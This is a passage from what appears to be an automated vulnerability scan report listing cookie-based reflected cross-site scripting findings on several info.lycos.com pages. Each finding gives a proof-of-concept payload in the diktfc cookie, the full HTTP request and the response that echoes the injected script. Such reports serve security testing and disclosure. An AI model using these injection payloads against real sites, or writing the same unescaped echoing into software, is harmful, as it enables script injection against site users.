The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 886fa"%3balert(1)//da603ed9901 was submitted in the diktfc cookie. This input was echoed as 886fa";alert(1)//da603ed9901 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A886fa"%3balert(1)//da603ed9901; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Cont
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/contact.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A886fa";alert(1)//da603ed9901.lycos.com"
});
</script>
...[SNIP]...

1.335. http://info.lycos.com/copyright.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /copyright.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27849"%3balert(1)//a9b9c529a48 was submitted in the diktfc cookie. This input was echoed as 27849";alert(1)//a9b9c529a48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /copyright.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A27849"%3balert(1)//a9b9c529a48; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Abus
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/copyright.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A27849";alert(1)//a9b9c529a48.lycos.com"
});
</script>
...[SNIP]...

1.336. http://info.lycos.com/copyright.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /copyright.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d10bb"><script>alert(1)</script>e5827dbe638 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /copyright.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad10bb"><script>alert(1)</script>e5827dbe638; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Abus
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/copyright.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad10bb"><script>alert(1)</script>e5827dbe638.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.337. http://info.lycos.com/jobs.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /jobs.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5251b"><script>alert(1)</script>887c4447e55 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jobs.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5251b"><script>alert(1)</script>887c4447e55; displayMobile=0; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Curr
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/jobs.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5251b"><script>alert(1)</script>887c4447e55.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.338. http://info.lycos.com/jobs.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /jobs.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d910"%3balert(1)//820c5e59da9 was submitted in the diktfc cookie. This input was echoed as 7d910";alert(1)//820c5e59da9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jobs.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7d910"%3balert(1)//820c5e59da9; displayMobile=0; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Curr
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/jobs.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7d910";alert(1)//820c5e59da9.lycos.com"
});
</script>
...[SNIP]...

1.339. http://info.lycos.com/legal/legal.asp [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /legal/legal.asp

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1655e"><script>alert(1)</script>bf11cff77f9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /legal/legal.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1655e"><script>alert(1)</script>bf11cff77f9; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1655e"><script>alert(1)</script>bf11cff77f9.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.340. http://info.lycos.com/legal/legal.asp [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /legal/legal.asp

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb6"%3balert(1)//37ed0722e88 was submitted in the diktfc cookie. This input was echoed as 4eeb6";alert(1)//37ed0722e88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legal/legal.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4eeb6"%3balert(1)//37ed0722e88; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4eeb6";alert(1)//37ed0722e88.lycos.com"
});
</script>
...[SNIP]...

1.341. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /legal/sectoolbar.html

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99a57"><script>alert(1)</script>cc300b5c45e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /legal/sectoolbar.html HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A99a57"><script>alert(1)</script>cc300b5c45e; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A99a57"><script>alert(1)</script>cc300b5c45e.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.342. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /legal/sectoolbar.html

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9447b"%3balert(1)//68c9f298253 was submitted in the diktfc cookie. This input was echoed as 9447b";alert(1)//68c9f298253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legal/sectoolbar.html HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9447b"%3balert(1)//68c9f298253; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9447b";alert(1)//68c9f298253.lycos.com"
});
</script>
...[SNIP]...

1.343. http://info.lycos.com/life.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /life.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971b4"%3balert(1)//81f487453e8 was submitted in the diktfc cookie. This input was echoed as 971b4";alert(1)//81f487453e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /life.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A971b4"%3balert(1)//81f487453e8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Life
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/life.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A971b4";alert(1)//81f487453e8.lycos.com"
});
</script>
...[SNIP]...

1.344. http://info.lycos.com/life.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /life.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35baa"><script>alert(1)</script>9cc8ee2a812 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /life.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35baa"><script>alert(1)</script>9cc8ee2a812; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Life
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/life.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35baa"><script>alert(1)</script>9cc8ee2a812.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.345. http://info.lycos.com/overview.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /overview.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe78f"%3balert(1)//0ed3ac7046c was submitted in the diktfc cookie. This input was echoed as fe78f";alert(1)//0ed3ac7046c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /overview.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe78f"%3balert(1)//0ed3ac7046c; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
